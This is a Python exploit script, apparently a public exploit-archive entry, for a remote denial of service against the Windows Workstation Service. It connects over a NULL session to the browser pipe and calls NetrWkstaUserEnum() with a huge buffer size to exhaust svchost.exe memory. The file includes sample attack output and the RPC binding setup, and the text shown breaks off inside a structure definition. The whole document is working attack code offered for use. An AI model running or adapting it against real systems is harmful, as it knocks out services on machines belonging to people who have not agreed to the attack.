#!/usr/bin/python # MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit # Bug discovered by h07 # Tested on:.. # - Windows XP SP2 Polish # - Windows 2000 SP4 Polish + All Microsoft Security Bulletins # Example: # # wks_dos.py 192.168.0.2 512 # # [*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit # [*] Coded by h07 # [*] Connecting to 192.168.0.2:445 (NULL Session) # [+] Connected # [+] The NETBIOS connection with the remote host timed out. # [+] 192.168.0.2: Out of memory # [+] Done # # NetrWkstaUserEnum(max_len = 1024 * 1024 * 512) # Exploit --> NULL Session --> PIPE: browser --> NetrWkstaUserEnum() --> Windows XP # svchost.exe memory usage: 512 MB ## from impacket.structure import Structure from impacket.nmb import NetBIOSTimeout from impacket.dcerpc import transport from impacket import uuid from struct import pack from string import atoi from sys import argv from sys import exit print "\n[*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit" print "[*] Coded by h07 " if(len(argv) < 3): print "[*] Usage: %s " % (argv[0]) print "[*] Sample: %s 192.168.0.1 512" % (argv[0]) exit() MB = 1024 * 1024 host = argv[1] memory_size = MB * atoi(argv[2]) pipe = 'browser' UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0') stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]" stringbinding %= {'host':host, 'pipe':pipe} def utf16(str): return str.encode('utf_16_le') class B1(Structure): alignment = 4 structure = ( ('id', '